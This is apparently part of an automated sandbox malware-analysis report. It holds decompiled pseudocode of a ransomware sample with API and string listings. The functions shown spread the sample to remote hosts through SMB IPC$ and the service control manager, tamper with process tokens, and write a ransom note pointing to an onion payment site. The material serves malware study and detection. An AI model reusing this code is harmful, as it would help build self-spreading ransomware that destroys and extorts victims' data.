                                                                                                                                                  			E0477516B(void* __ecx, intOrPtr _a4, char _a8, signed int _a12, signed char _a15, signed int _a16, intOrPtr _a20) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				char* _v20;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				void* _t79;
                                                                                                                                                  				signed int _t80;
                                                                                                                                                  				signed int _t82;
                                                                                                                                                  				signed int _t84;
                                                                                                                                                  				intOrPtr* _t91;
                                                                                                                                                  				intOrPtr* _t104;
                                                                                                                                                  				void* _t109;
                                                                                                                                                  				signed int _t112;
                                                                                                                                                  				signed int _t113;
                                                                                                                                                  				intOrPtr _t115;
                                                                                                                                                  				signed int _t116;
                                                                                                                                                  				intOrPtr _t118;
                                                                                                                                                  				intOrPtr* _t122;
                                                                                                                                                  
                                                                                                                                                  				_t126 = _a4;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				if(E04771EB9(_a4,  &_a8, _a12, "IPC$") != 0) {
                                                                                                                                                  					_v12 = _v12 & 0x00000000;
                                                                                                                                                  					if(E04772054(_t126, _a8,  &_v12, "svcctl", 1) != 0 && E04774E60(_t126, _a8, _v12) != 0) {
                                                                                                                                                  						_t72 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                  						_v16 = _t72;
                                                                                                                                                  						if(_t72 != 0) {
                                                                                                                                                  							if(E04774F43(_v12, _t126, _a8,  &_v16) != 0) {
                                                                                                                                                  								_t79 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                  								_v20 = _t79;
                                                                                                                                                  								if(_t79 != 0) {
                                                                                                                                                  									_t80 = rand();
                                                                                                                                                  									asm("cdq");
                                                                                                                                                  									_push(_t80 % 0xf4240);
                                                                                                                                                  									_t82 = rand();
                                                                                                                                                  									asm("cdq");
                                                                                                                                                  									_t112 = 0xa;
                                                                                                                                                  									_push(_t82 % _t112);
                                                                                                                                                  									_t84 = rand();
                                                                                                                                                  									_t113 = 0xa;
                                                                                                                                                  									asm("cdq");
                                                                                                                                                  									_push(_t84 % _t113);
                                                                                                                                                  									sprintf(_v20, "clr_optimization_v%d.%d.%d");
                                                                                                                                                  									_t109 = HeapAlloc(GetProcessHeap(), 8, 0x208);
                                                                                                                                                  									if(_t109 != 0) {
                                                                                                                                                  										_t122 = _a16;
                                                                                                                                                  										_t91 = _t122;
                                                                                                                                                  										_a15 = 0;
                                                                                                                                                  										_a16 = _t91 + 1;
                                                                                                                                                  										do {
                                                                                                                                                  											_t115 =  *_t91;
                                                                                                                                                  											_t91 = _t91 + 1;
                                                                                                                                                  										} while (_t115 != 0);
                                                                                                                                                  										if(_t91 != _a16) {
                                                                                                                                                  											_t116 = 0;
                                                                                                                                                  											do {
                                                                                                                                                  												_a15 = _a15 + 1;
                                                                                                                                                  												 *((char*)(_t109 + _t116)) =  *((intOrPtr*)(_t116 + _t122));
                                                                                                                                                  												_t104 = _t122;
                                                                                                                                                  												_a16 = _t104 + 1;
                                                                                                                                                  												do {
                                                                                                                                                  													_t118 =  *_t104;
                                                                                                                                                  													_t104 = _t104 + 1;
                                                                                                                                                  												} while (_t118 != 0);
                                                                                                                                                  												_t116 = _a15 & 0x000000ff;
                                                                                                                                                  											} while (_t116 < _t104 - _a16);
                                                                                                                                                  										}
                                                                                                                                                  										sprintf(_t109, "rundll32 %s,#2 %s", _a20, _t122);
                                                                                                                                                  										_a16 = _a16 & 0x00000000;
                                                                                                                                                  										_a12 = _a12 & 0x00000000;
                                                                                                                                                  										if(E04774B5D(_v20, _v16, _t109,  &_a16,  &_a12) != 0 && E0477501E(_t115, _a4, _a8, _v12, _a16, _a12,  &_v16) != 0 && E047750A2(_t115, _a4, _a8, _v12, _v16) != 0) {
                                                                                                                                                  											_v5 = 1;
                                                                                                                                                  										}
                                                                                                                                                  										HeapFree(GetProcessHeap(), 8, _t109);
                                                                                                                                                  									}
                                                                                                                                                  									HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}





















                                                                                                                                                  0x04775172
                                                                                                                                                  0x04775182
                                                                                                                                                  0x0477518d
                                                                                                                                                  0x04775193
                                                                                                                                                  0x047751ad
                                                                                                                                                  0x047751dc
                                                                                                                                                  0x047751de
                                                                                                                                                  0x047751e3
                                                                                                                                                  0x047751fb
                                                                                                                                                  0x04775208
                                                                                                                                                  0x0477520a
                                                                                                                                                  0x0477520f
                                                                                                                                                  0x0477521b
                                                                                                                                                  0x0477521d
                                                                                                                                                  0x04775225
                                                                                                                                                  0x04775226
                                                                                                                                                  0x0477522a
                                                                                                                                                  0x0477522b
                                                                                                                                                  0x0477522e
                                                                                                                                                  0x0477522f
                                                                                                                                                  0x04775233
                                                                                                                                                  0x04775234
                                                                                                                                                  0x0477523d
                                                                                                                                                  0x04775246
                                                                                                                                                  0x04775257
                                                                                                                                                  0x0477525b
                                                                                                                                                  0x04775261
                                                                                                                                                  0x04775264
                                                                                                                                                  0x04775269
                                                                                                                                                  0x0477526d
                                                                                                                                                  0x04775270
                                                                                                                                                  0x04775270
                                                                                                                                                  0x04775272
                                                                                                                                                  0x04775273
                                                                                                                                                  0x0477527a
                                                                                                                                                  0x0477527c
                                                                                                                                                  0x0477527e
                                                                                                                                                  0x04775281
                                                                                                                                                  0x04775284
                                                                                                                                                  0x04775287
                                                                                                                                                  0x0477528c
                                                                                                                                                  0x0477528f
                                                                                                                                                  0x0477528f
                                                                                                                                                  0x04775291
                                                                                                                                                  0x04775292
                                                                                                                                                  0x04775296
                                                                                                                                                  0x0477529d
                                                                                                                                                  0x0477527e
                                                                                                                                                  0x047752ab
                                                                                                                                                  0x047752ad
                                                                                                                                                  0x047752b1
                                                                                                                                                  0x047752ce
                                                                                                                                                  0x04775301
                                                                                                                                                  0x04775301
                                                                                                                                                  0x0477530b
                                                                                                                                                  0x0477530b
                                                                                                                                                  0x04775319
                                                                                                                                                  0x04775319
                                                                                                                                                  0x0477520f
                                                                                                                                                  0x04775327
                                                                                                                                                  0x04775327
                                                                                                                                                  0x0477532e
                                                                                                                                                  0x047751ad
                                                                                                                                                  0x04775334

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04771EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0477943A), ref: 04771ED2
                                                                                                                                                    • Part of subcall function 04771EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04771EDB
                                                                                                                                                    • Part of subcall function 04771EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0477943A), ref: 04771F1F
                                                                                                                                                    • Part of subcall function 04771EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04771F22
                                                                                                                                                    • Part of subcall function 04771EB9: htons.WS2_32(?), ref: 04771F41
                                                                                                                                                    • Part of subcall function 04772054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0477943A), ref: 0477206D
                                                                                                                                                    • Part of subcall function 04772054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04772076
                                                                                                                                                    • Part of subcall function 04772054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0477943A), ref: 0477209C
                                                                                                                                                    • Part of subcall function 04772054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 0477209F
                                                                                                                                                    • Part of subcall function 04772054: htons.WS2_32(?), ref: 047720BC
                                                                                                                                                    • Part of subcall function 04772054: send.WS2_32(?,00000000,?,00000000), ref: 04772131
                                                                                                                                                    • Part of subcall function 04772054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04772148
                                                                                                                                                    • Part of subcall function 04772054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0477943A), ref: 04772168
                                                                                                                                                    • Part of subcall function 04772054: HeapFree.KERNEL32(00000000,?,?,?,?,0477943A), ref: 0477216F
                                                                                                                                                    • Part of subcall function 04774E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04774E76
                                                                                                                                                    • Part of subcall function 04774E60: HeapAlloc.KERNEL32(00000000), ref: 04774E79
                                                                                                                                                    • Part of subcall function 04774E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04774F2A
                                                                                                                                                    • Part of subcall function 04774E60: HeapFree.KERNEL32(00000000), ref: 04774F2D
                                                                                                                                                    • Part of subcall function 04774E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04774F32
                                                                                                                                                    • Part of subcall function 04774E60: HeapFree.KERNEL32(00000000), ref: 04774F35
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 047751D3
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047751DC
                                                                                                                                                    • Part of subcall function 04774F43: GetProcessHeap.KERNEL32(00000008,00000068,74CB4F20,?,778C4620,?,047751F9,?,?,?), ref: 04774F56
                                                                                                                                                    • Part of subcall function 04774F43: HeapAlloc.KERNEL32(00000000,?,047751F9,?,?,?), ref: 04774F5D
                                                                                                                                                    • Part of subcall function 04774F43: rand.MSVCRT ref: 04774F86
                                                                                                                                                    • Part of subcall function 04774F43: GetProcessHeap.KERNEL32(00000008,?,047751F9,?,00000000,?,047751F9,047751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04774FF7
                                                                                                                                                    • Part of subcall function 04774F43: HeapFree.KERNEL32(00000000), ref: 04774FFE
                                                                                                                                                    • Part of subcall function 04774F43: GetProcessHeap.KERNEL32(00000008,00000000,047751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,047751F9,?,?,?), ref: 04775007
                                                                                                                                                    • Part of subcall function 04774F43: HeapFree.KERNEL32(00000000,?,047751F9,?,?,?), ref: 0477500E
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04775205
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04775208
                                                                                                                                                  • rand.MSVCRT ref: 0477521B
                                                                                                                                                  • rand.MSVCRT ref: 04775226
                                                                                                                                                  • rand.MSVCRT ref: 0477522F
                                                                                                                                                  • sprintf.MSVCRT ref: 04775246
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775252
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775255
                                                                                                                                                  • sprintf.MSVCRT ref: 047752AB
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04775308
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477530B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775316
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775319
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04775324
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04775327
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                                                                                                                                  • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                                                                                                  • API String ID: 1576125627-3210642070
                                                                                                                                                  • Opcode ID: ef3a48740910f73765e612500c5ff94d58acbbb25c6c000e3aee837fabea700b
                                                                                                                                                  • Instruction ID: 6810377a26ceb20ee350067d9e3be5377177af0993596e9f8d582674ace63c2d
                                                                                                                                                  • Opcode Fuzzy Hash: ef3a48740910f73765e612500c5ff94d58acbbb25c6c000e3aee837fabea700b
                                                                                                                                                  • Instruction Fuzzy Hash: 7451D172900209BBDF11EFA4CD44FEE7BAAEF49304F844045FA44A7251CBB5E919CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E047785FB(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, char _a92, long _a96, char _a648, int _a656, void _a660) {
                                                                                                                                                  				void* _v0;
                                                                                                                                                  				void* _v4;
                                                                                                                                                  				void _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed int _t85;
                                                                                                                                                  				signed int _t89;
                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                  				signed int _t107;
                                                                                                                                                  				void* _t109;
                                                                                                                                                  
                                                                                                                                                  				E0477A760(0x1294);
                                                                                                                                                  				_a8 = 0;
                                                                                                                                                  				_a24 = 0;
                                                                                                                                                  				_a656 = 0;
                                                                                                                                                  				memset( &_a660, 0, 0xffc);
                                                                                                                                                  				_t109 = (_t107 & 0xfffffff8) + 0xc;
                                                                                                                                                  				_v0 = 0;
                                                                                                                                                  				_a36 = E04778147();
                                                                                                                                                  				_t62 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                  				_a16 = _t62;
                                                                                                                                                  				if(_t62 == 0xffffffff) {
                                                                                                                                                  					L21:
                                                                                                                                                  					return _a4;
                                                                                                                                                  				}
                                                                                                                                                  				_push( &_a92);
                                                                                                                                                  				_a92 = 0x22c;
                                                                                                                                                  				if(Process32FirstW(_t62) == 0) {
                                                                                                                                                  					GetLastError();
                                                                                                                                                  					L20:
                                                                                                                                                  					CloseHandle(_a12);
                                                                                                                                                  					goto L21;
                                                                                                                                                  				}
                                                                                                                                                  				_a24 = _a4 -  &_a648;
                                                                                                                                                  				do {
                                                                                                                                                  					_a8 = _a8 | 0xffffffff;
                                                                                                                                                  					_v4 = 0;
                                                                                                                                                  					_a4 = 0;
                                                                                                                                                  					_t69 = OpenProcess(0x450, 0, _a96);
                                                                                                                                                  					_a20 = _t69;
                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                  						L16:
                                                                                                                                                  						if(_v0 >= 0x40) {
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						goto L17;
                                                                                                                                                  					}
                                                                                                                                                  					if(OpenProcessToken(_t69, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
                                                                                                                                                  						L15:
                                                                                                                                                  						CloseHandle(_v4);
                                                                                                                                                  						CloseHandle(_a20);
                                                                                                                                                  						goto L16;
                                                                                                                                                  					} else {
                                                                                                                                                  						memset( &_a20, 0, 0x38);
                                                                                                                                                  						_t109 = _t109 + 0xc;
                                                                                                                                                  						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						}
                                                                                                                                                  						_t103 = _a24;
                                                                                                                                                  						_t85 = 0;
                                                                                                                                                  						if(_v24 <= 0) {
                                                                                                                                                  							L13:
                                                                                                                                                  							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
                                                                                                                                                  								_t89 = _v28 << 2;
                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                  								_v28 = _v28 + 1;
                                                                                                                                                  								 *((intOrPtr*)(_t109 + _a4 + _t89 + 0x2a0)) = _v16;
                                                                                                                                                  								 *((intOrPtr*)(_t109 + _t89 + 0x2a0)) = _t103;
                                                                                                                                                  							}
                                                                                                                                                  							goto L15;
                                                                                                                                                  						}
                                                                                                                                                  						while( *((intOrPtr*)(_t109 + 0x2a0 + _t85 * 4)) != _t103) {
                                                                                                                                                  							_t85 = _t85 + 1;
                                                                                                                                                  							if(_t85 < _v24) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					L17:
                                                                                                                                                  				} while (Process32NextW(_a12,  &_a88) != 0);
                                                                                                                                                  				goto L20;
                                                                                                                                                  			}


















                                                                                                                                                  0x04778606
                                                                                                                                                  0x0477861e
                                                                                                                                                  0x04778622
                                                                                                                                                  0x04778626
                                                                                                                                                  0x0477862d
                                                                                                                                                  0x04778632
                                                                                                                                                  0x04778635
                                                                                                                                                  0x04778641
                                                                                                                                                  0x04778645
                                                                                                                                                  0x0477864b
                                                                                                                                                  0x04778652
                                                                                                                                                  0x047787da
                                                                                                                                                  0x047787e4
                                                                                                                                                  0x047787e4
                                                                                                                                                  0x0477865c
                                                                                                                                                  0x0477865e
                                                                                                                                                  0x0477866e
                                                                                                                                                  0x047787ca
                                                                                                                                                  0x047787d0
                                                                                                                                                  0x047787d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047787d4
                                                                                                                                                  0x04778680
                                                                                                                                                  0x04778689
                                                                                                                                                  0x0477868d
                                                                                                                                                  0x04778698
                                                                                                                                                  0x0477869c
                                                                                                                                                  0x047786a0
                                                                                                                                                  0x047786a6
                                                                                                                                                  0x047786ac
                                                                                                                                                  0x047787aa
                                                                                                                                                  0x047787af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047787af
                                                                                                                                                  0x047786c1
                                                                                                                                                  0x04778798
                                                                                                                                                  0x047787a2
                                                                                                                                                  0x047787a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778716
                                                                                                                                                  0x0477871e
                                                                                                                                                  0x04778723
                                                                                                                                                  0x0477873c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477873e
                                                                                                                                                  0x04778742
                                                                                                                                                  0x04778748
                                                                                                                                                  0x0477875a
                                                                                                                                                  0x0477876f
                                                                                                                                                  0x0477877d
                                                                                                                                                  0x04778782
                                                                                                                                                  0x04778786
                                                                                                                                                  0x0477878a
                                                                                                                                                  0x04778791
                                                                                                                                                  0x04778791
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477876f
                                                                                                                                                  0x0477874a
                                                                                                                                                  0x04778753
                                                                                                                                                  0x04778758
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778758
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477874a
                                                                                                                                                  0x047787b1
                                                                                                                                                  0x047787c0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 0477862D
                                                                                                                                                    • Part of subcall function 04778147: memset.MSVCRT ref: 04778160
                                                                                                                                                    • Part of subcall function 04778147: GetVersionExW.KERNEL32(?,?,?,74CB43E0), ref: 04778179
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04778645
                                                                                                                                                  • Process32FirstW.KERNEL32 ref: 04778666
                                                                                                                                                  • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 047786A0
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 047786B9
                                                                                                                                                  • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 047786DF
                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04778708
                                                                                                                                                  • memset.MSVCRT ref: 0477871E
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04778738
                                                                                                                                                  • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04778767
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047787A2
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047787A8
                                                                                                                                                  • Process32NextW.KERNEL32(?,?), ref: 047787BA
                                                                                                                                                  • GetLastError.KERNEL32 ref: 047787CA
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047787D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 4137997400-2766056989
                                                                                                                                                  • Opcode ID: a588afa07d000a71514b695288777f94410245b15cc22f6dcbf973beba63e480
                                                                                                                                                  • Instruction ID: ad923aea57a83f230034e60ff0f955f2c973387221400027ec014bf9cba8887f
                                                                                                                                                  • Opcode Fuzzy Hash: a588afa07d000a71514b695288777f94410245b15cc22f6dcbf973beba63e480
                                                                                                                                                  • Instruction Fuzzy Hash: 8C510AB1508301AFE720AF65D848A6BBBE8FF88754F854A29F595D2290D730E905CB93
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047760F9(struct _OVERLAPPED* _a4) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				short _v528;
                                                                                                                                                  				short _v2088;
                                                                                                                                                  				void _v10280;
                                                                                                                                                  				signed int _t35;
                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                  
                                                                                                                                                  				E0477A760(0x2824);
                                                                                                                                                  				wsprintfW( &_v528, L"%s", L"Readme.txt");
                                                                                                                                                  				_t71 = _a4;
                                                                                                                                                  				if(PathCombineW( &_v2088, _t71 + 4,  &_v528) != 0) {
                                                                                                                                                  					_t35 = E04776477();
                                                                                                                                                  					if(_t35 != 0) {
                                                                                                                                                  						if(_t35 > 1) {
                                                                                                                                                  							_t35 = _t35 - 1;
                                                                                                                                                  						}
                                                                                                                                                  						if(WaitForMultipleObjects((0 |  *((intOrPtr*)(_t71 + 0x4c)) != 0x00000000) + 1, _t71 + 0x48, 0, _t35 * 0xea60) != 0) {
                                                                                                                                                  							_t63 = CreateFileW( &_v2088, 0x40000000, 0, 0, 1, 0, 0);
                                                                                                                                                  							if(_t63 != 0xffffffff) {
                                                                                                                                                  								_a4 = 0;
                                                                                                                                                  								if(E047757E5( *((intOrPtr*)(_t71 + 0x38)),  *_t71, _t71 + 0xc,  &_a4) != 0) {
                                                                                                                                                  									memset( &_v10280, 0, 0x1000);
                                                                                                                                                  									StrCatW( &_v10280, L"Oops! Your files have been encrypted.\r\n\r\nIf you see this text, your files are no longer accessible.\r\nYou might have been looking for a way to recover your files.\r\nDon\'t waste your time. No one will be able to recover them without our\r\ndecryption service.\r\n\r\nWe  guarantee that you can recover all your files safely. All you\r\nneed to do is submit the payment and get the decryption password.\r\n\r\nVisit our web service at caforssztxqzf2nm.onion\r\n\r\nYour personal installation key#2:\r\n\r\n");
                                                                                                                                                  									StrCatW( &_v10280, _a4);
                                                                                                                                                  									_t54 =  &_v10280;
                                                                                                                                                  									_v8 = 0;
                                                                                                                                                  									_t65 = _t54 + 2;
                                                                                                                                                  									do {
                                                                                                                                                  										_t67 =  *_t54;
                                                                                                                                                  										_t54 = _t54 + 2;
                                                                                                                                                  									} while (_t67 != 0);
                                                                                                                                                  									if(WriteFile(_t63,  &_v10280, (_t54 - _t65 >> 1) + (_t54 - _t65 >> 1),  &_v8, 0) != 0) {
                                                                                                                                                  										FlushFileBuffers(_t63);
                                                                                                                                                  									}
                                                                                                                                                  									LocalFree(_a4);
                                                                                                                                                  								}
                                                                                                                                                  								CloseHandle(_t63);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return 1;
                                                                                                                                                  			}













                                                                                                                                                  0x04776101
                                                                                                                                                  0x04776118
                                                                                                                                                  0x0477611e
                                                                                                                                                  0x0477613e
                                                                                                                                                  0x04776145
                                                                                                                                                  0x0477614e
                                                                                                                                                  0x04776157
                                                                                                                                                  0x04776159
                                                                                                                                                  0x04776159
                                                                                                                                                  0x04776178
                                                                                                                                                  0x04776197
                                                                                                                                                  0x0477619c
                                                                                                                                                  0x047761ac
                                                                                                                                                  0x047761b9
                                                                                                                                                  0x047761c8
                                                                                                                                                  0x047761e2
                                                                                                                                                  0x047761ee
                                                                                                                                                  0x047761f0
                                                                                                                                                  0x047761f6
                                                                                                                                                  0x047761f9
                                                                                                                                                  0x047761fc
                                                                                                                                                  0x047761fc
                                                                                                                                                  0x047761ff
                                                                                                                                                  0x04776202
                                                                                                                                                  0x04776223
                                                                                                                                                  0x04776226
                                                                                                                                                  0x04776226
                                                                                                                                                  0x0477622f
                                                                                                                                                  0x0477622f
                                                                                                                                                  0x04776236
                                                                                                                                                  0x04776236
                                                                                                                                                  0x0477623c
                                                                                                                                                  0x04776178
                                                                                                                                                  0x0477623d
                                                                                                                                                  0x04776243

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 04776118
                                                                                                                                                  • PathCombineW.SHLWAPI(?,?,?), ref: 04776136
                                                                                                                                                    • Part of subcall function 04776477: GetTickCount.KERNEL32 ref: 04776477
                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04776170
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04776191
                                                                                                                                                  • memset.MSVCRT ref: 047761C8
                                                                                                                                                  • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 047761E2
                                                                                                                                                  • StrCatW.SHLWAPI(?,?), ref: 047761EE
                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0477621B
                                                                                                                                                  • FlushFileBuffers.KERNEL32(00000000), ref: 04776226
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0477622F
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04776236
                                                                                                                                                  Strings
                                                                                                                                                  • Readme.txt, xrefs: 04776107
                                                                                                                                                  • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 047761D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                                                                                                  • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
